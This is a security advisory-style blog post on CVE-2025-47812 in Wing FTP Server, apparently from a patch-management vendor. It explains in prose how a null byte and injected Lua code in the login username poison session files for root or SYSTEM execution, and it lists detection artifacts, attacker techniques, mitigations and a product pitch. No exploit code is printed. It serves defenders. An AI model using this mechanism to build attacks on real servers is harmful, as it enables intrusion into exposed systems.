You are currently viewing Wing FTP Under Siege: Critical Vulnerability Actively Exploited

Wing FTP Under Siege: Critical Vulnerability Actively Exploited

  • Post author:
  • Reading time:4 mins read

A critical vulnerability, CVE-2025-47812, in Wing FTP Server is under active exploitation, allowing unauthenticated remote code execution with root or SYSTEM privileges. This flaw has a CVSS score of 10.0, marking it highly severe.

Vulnerability Details

The vulnerability, identified as CVE-2025-47812, arises from the improper handling of null bytes in Wing FTP Server’s web interface, particularly within the loginok.html endpoint responsible for processing authentication requests.

Wing FTP Server is a commercial file transfer solution widely used by businesses, MSPs, and hosting providers. It is available on Windows, Linux, and macOS.

Root Cause

CVE-2025-47812 is caused by a null byte injection flaw and Lua code injection. This combination allows attackers to bypass authentication checks and inject arbitrary commands into server session files.

Proof of Concept (PoC)

Security researcher Julien Ahrens disclosed the vulnerability on June 30, 2025, along with two other vulnerabilities (CVE-2025-47811 and CVE-2025-47813), providing proof-of-concept exploits. Huntress Labs also created a PoC demonstrating arbitrary code execution as root on Linux or SYSTEM on Windows. Here’s how the PoC works:

Login Request Exploit

  • An attacker submits a POST to loginok.htmlSupplying a username that includes a %00 character followed by crafted Lua code.
  • The %00 Null-byte truncates expected string parsing, while the trailing Lua payload closes the existing syntax and appends malicious code.
  • The payload ends with -- to comment out any leftover syntax.

Session File Injection

  • Wing FTP stores user session data (username, IP, working directory) in .lua session files.
  • The malformed username uses this file alongside the injected Lua, corrupting the session data and embedding the attack code.

Triggering Code Execution

  • When the server later accesses any session-reflecting endpoint (e.g., dir.html), it unknowingly executes the poisoned session file as Lua script.
  • This results in the attacker’s code running with root or SYSTEM privileges, depending on the OS.

Observations & Artifacts

  • Logs in Log/Domains/.../YYYY-M-D.log show truncated entries like User 'anonymous (missing closing quote), a telltale null byte effect.
  • The session directory contains unusual .lua files, typically oversized due to injected code. Upon inspection, these contain a base? Encoded payloads, which, when decoded, launch commands such as downloading and executing binaries via certutil.

Impact & Exploit Potential

Successful exploitation of CVE-2025-47812 allows attackers to inject Lua code into session files, which executes with elevated privileges when processed by the server. This grants attackers complete control over the system and can be executed via anonymous FTP accounts. According to Censys, approximately 8,103 devices are running Wing FTP Server, with around 5,004 exposing their web interfaces to the internet.

Tactics, Techniques, and Procedures (TTPs)

The following TTPs are associated with the exploitation of CVE-2025-47812:

TA0002 – Execution: Attackers inject arbitrary Lua code to execute commands with root or SYSTEM privileges.

TA0003 – Persistence: Attackers may create new user accounts for persistent access.

T1203 – Exploitation for Client Execution: Exploit the vulnerability to execute malicious code on the server.

T1098 – Account Manipulation: Attackers create new accounts to maintain access to the compromised system.

Affected Products

The vulnerability affects the following products:

  • Wing FTP Server versions before 7.4.4

Mitigation & Recommendations

To mitigate the risk posed by CVE-2025-47812, apply the following measures:

  • Upgrade to Wing FTP Server version 7.4.4.
  • Disable or restrict HTTP/HTTPS access to the Wing FTP web portal.
  • Disable anonymous login functionality.
  • Monitor session directories for suspicious .lua files.
  • Implement network segmentation to limit exposure.

Active Exploitation

Huntress Labs observed actively exploiting this vulnerability starting on July 1, 2025, shortly after the public disclosure.

Observed attacker activity included reconnaissance, system enumeration, user creation, and attempts to download and execute remote malware.

Instantly Fix Risks with Saner Patch Management

Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.

It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.

Experience the fastest and most accurate patching software here.